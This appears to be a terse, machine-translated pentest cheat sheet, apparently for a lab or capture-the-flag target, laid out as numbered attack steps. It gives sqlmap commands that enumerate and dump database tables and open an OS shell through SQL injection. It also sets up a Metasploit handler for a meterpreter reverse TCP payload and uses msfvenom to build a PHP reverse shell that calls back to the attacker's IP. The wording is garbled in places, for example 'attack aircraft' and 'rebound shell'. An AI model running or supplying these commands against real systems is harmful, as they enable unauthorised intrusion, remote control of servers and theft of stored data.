1. http: // ip: port to open the page to find information
2. web vulnerability scanner owasp-zap
3. Use sqlmap use sql injection vulnerability
sqlmap -u url -dbs view the database name
sqlmap -u url -D "database name" -tables view the corresponding data in the database table
sqlmap -u url -D "database name" -T "table" -columns view the corresponding field
sqlmap -u url -D "database name" -T "Table Name" -C "column name" -dump field of view corresponding to the value
You can also try sqlmap -u url -os-shell direct access shell
4. ifconfig
netstat -pantu view the local port case
5. Start the listener attack aircraft
msf > use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost attack aircraft ip
set lport 4444
run
6. Generate rebound shell
msfvenom -p php / meterpreter / reverse_tcp lhost = Attacker IP lport = 4444 -f raw> /root/Desktop/shell.php